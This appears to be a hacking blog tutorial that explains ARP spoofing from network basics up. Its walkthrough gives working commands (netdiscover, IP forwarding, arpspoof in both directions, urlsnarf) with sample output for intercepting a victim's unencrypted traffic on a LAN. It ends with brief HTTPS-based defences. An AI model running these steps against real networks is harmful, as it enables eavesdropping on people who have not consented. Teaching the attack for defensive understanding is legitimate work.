How to Explain ARP Spoofing to Your Mom

ARP Spoofing also referred to as ARP Poisoning is a type of man in the middle attack. Where someone sits between a target (victim) and the router to listen in on the online traffic. This is a type of cyber attack carried out over a Local Area Network (LAN) that involves sending malicious ARP packets to a default gateway on a LAN in order to change the pairings in its IP to MAC address table. ARP Protocol translates IP addresses into MAC addresses. If any of that was unclear by the end of this post you will not only understand it but be able to demonstrate it. And as a bonus you will know how to protect yourself against these attacks.

How the Internet Transmits Data

Before diving into ARP spoofing, we have to take a second and understand the internet’s general communication systems. Don’t worry we will be getting into the fun stuff very shortly. Just want to make sure the why this attack works is understood first. The three things we are going to cover are Packets, MAC Addresses, and IP Addresses.

Packets

All information on the internet is transmitted via packets. Think of packets as packages that have data you need to send. And just like if you where to send a gift threw UPS you need to give them a few things. You have to give them the person it is going to and the address of the person. Think of it like the “TO” and “ADDRESS” on packages. Now that is only half the information though you still have to give them your name and address. Now where these values swap out is the “TO” and “FROM” use MAC addresses instead of peoples names. And the “ADDRESS” is filled with IP addresses.

The last thing to touch on about packets is how they get moved around. They use routers to sort and forward all the packets. Packets make their way through the internet, traveling from router to router like packages travels from post office to post office. Now enough about packets lets move onto the next part MAC addresses.

MAC Addresses

All devices on a network contains something call a Network Interface Card (NIC). That means everything from you laptop to your cell phone has a NIC. Well to be honest everything that talks to the internet in some way has a NIC. So your gaming counsels to your smart fridge has a NIC. The need it so they can send packets as well as receive them. Because the NIC is what has the unique address of a MAC address. This is how the router can tell all the devices on the network apart from one another.

MAC addresses are normally 48-bit numbers written in hexadecimal (for example, AC:F6:F7:B2:AE:81). The first group of 3 numbers is a vendor specific number. So in our example AC:F6:F7 from the vendor LG Electronics. And the second group of 3 numbers is what ever the vendor wants to assign themselves. The make is so you don’t have two devices ending up with the same MAC address on your network. Because just imagine the headache of having two people with the same name living together. I’m looking at you people named Junior and Senior. Now onto the last part of packet identification IP addresses.

IP Addresses

I’m sure most of you are already aware of IP addresses and what they are. But just incase I’m going to cover them here real quick. IP addresses also identify machines on a network. But wait if that is true why do we need MAC addresses at all? Well, networks consist of hierarchical regions similarly to how countries are split into states or provinces. Which in turn have cites and towns. Now because of the limitations of available IP addresses not every device can be relied upon to use just IP addresses. An IPv4 address encodes the network hierarchy information in a 32-bit number. This number is typically represented in four sections separated by dots as in (192.168.3.1). IP addresses in the same region of this hierarchy also share the same upper-level bits. The further to the left of the IP address the higher in the bit.

Here is an example, all machines on the University of Virginia campus have IPv4 addresses like 128.143.***.***. You might also run into this written like 128.143.1.1/16, that is how a subclass is written using Classless Inter-Domain Routing (CIDR). But luckily you don’t need to know all that for now as subclass domains are a real monster to get your head around. At least is is for me anyways. All you need to know is because IP addresses follow a particular structure, routers can use parts of the IP address to decide how to route a packet through the hierarchy the most efficient way. And so with a mixture of subnet, IPs and MAC address you can use your devices easily.

What are ARP Tables

Now that the main internet topics have been covered you now have a better understanding of the juggling act that goes on every time a packet gets sent. Once a packet gets to the LAN the network uses the packet’s MAC address to determine the machine or device that it belongs to. But how does the router know what MAC address belongs to what IP address. Simple it sends something called an ARP query to all machines on the network. And the machines respond back with its MAC address. But if your router had to go threw that process every time it got a packet for sending and receiving, Netflix would still be a DVD rental business.

So if preforming that entire process of query and response to find a packets destination not to mention best route how do we speed it up? That’s right ARP tables to the rescue. Once the router gets a response from an ARP query it saves the response in this ARP table. By keeping track of this information it limits the number of times it needs to ask what IP has the packets MAC address.

To summarize what we covered so far MAC addresses identify who you are, IP addresses identify where you are and ARP tables keep track of the mapping.

ARP Spoofing Attacks Explained

Now that all the basic explanations are taken care of lets get to the fun stuff. An ARP spoofing attack consist of two steps. The first step is an attacker sends a fake ARP response to the victim, saying that the attacker’s device is the router for the LAN. This makes the victims systems think that all of their packets need to be passed to the attacker before getting to the where it needs to go. This is done because like the router devices have ARP tables so they don’t have to keep reaching out when they want to send something. The second step is when the attacker gets sent packets from the victim it then sends the packets over to the real LAN router. While you could just stop the traffic and not send it, this tactic wouldn’t be for much of a Man-in-the-middle (MITM) attack.

Now while that is all you need in order to preform an ARP Spoofing attack if you want to get your hands on even more data you are going to have to take extra steps. We are going to do the same steps as before but this time telling the router that you are the victim machine instead of telling the router you are the router. By doing this you get to see and send the responses of unencrypted packets. Now that we know what an ARP spoofing attack is lets get into the how.

Performing Your Own ARP Spoofing Attack

Before we perform an ARP spoofing attack lets make sure we have all the requirements covered. You are going to need dsniff, netdiscover, arpspoof, and urlsnarf. While these tools can be swapped out like changing dsniff for netcat or urlsnarf for wireshark they are the ones I’m going to use for this demonstration. I’m also going to be doing this on a Ubuntu system to show you don’t always need Kali for hacking (I still encourage everyone to check KALI our though). Before installing via apt-get always make sure to update regularly.

codebycody@TJOH:~$ sudo -i
codebycody@TJOH:~$ apt-get update
codebycody@TJOH:~$ apt-get install dsniff

Now we can start looking for devices to target on the network using netdiscover.
codebycody@TJOH:~$ netdiscover
Currently scanning: 172.27.139.0/16 | Screen View: Unique Host

27 Capptured ARP Req/Rep packets, from 15 hosts. Total size: 1534
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.1 08:02:8e:88:c3:cb 11 660 NETGEAR
192.168.0.3 e8:9f:80:7c:bd:2b 3 180 Unknown vender

The above you can see the response gave us back the MAC address of the router in this case a NETGEAR device, as well as a target. In order to allow your machine to preform port forwarding you have to set a flag for your system to look for. With Ubuntu and Kali you set this flag by running the command echo 1 > /proc/sys/net/ipv4/ip_forward. Now we can start ARP spoofing by running the following command arpspoofing -i eth0 -t <VICTIM_IP> <ROUTER_IP>. Just remember you need to run the command again but swapping the victim IP and the router IP. This will keep you in the middle for both out going and incoming responses. Now you can run urlsnarf to capture unencrypted packets being sent between the two devices as follows.
codebycody@TJOH:~$ urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
192.168.0.11 - - [14/Nov/2021:16:50:39 -0500] "GET http://thejoyofhacking.com/ HTTP/1.1" - - "-" "Mozilla/5.0 (Linux; Android 10; LM-G820) AppleWebkit/537.36 (KHTML, like Gecko) Chrom/95.0.4638.74 Mobile Safari/537.36

How to Protect Against ARP Spoofing Attacks

Although it’s difficult to prevent an ARP spoofing attack, encrypting your internet traffic helps protect your information from being stolen or modified. Any traffic sent over an HTTPS connection is encrypted. However, manually checking to ensure that every URL you visit uses HTTPS is tedious, so the Electronic Frontier Foundation (eff.org) has created a web browser extension (for Chrome, Edge, Firefox and Opera) called HTTPS Everywhere that ensures that all your web traffic goes over an HTTPS connection. Installing this plug-in is a great way to keep your friends, family and yourself safe against ARP spoofing.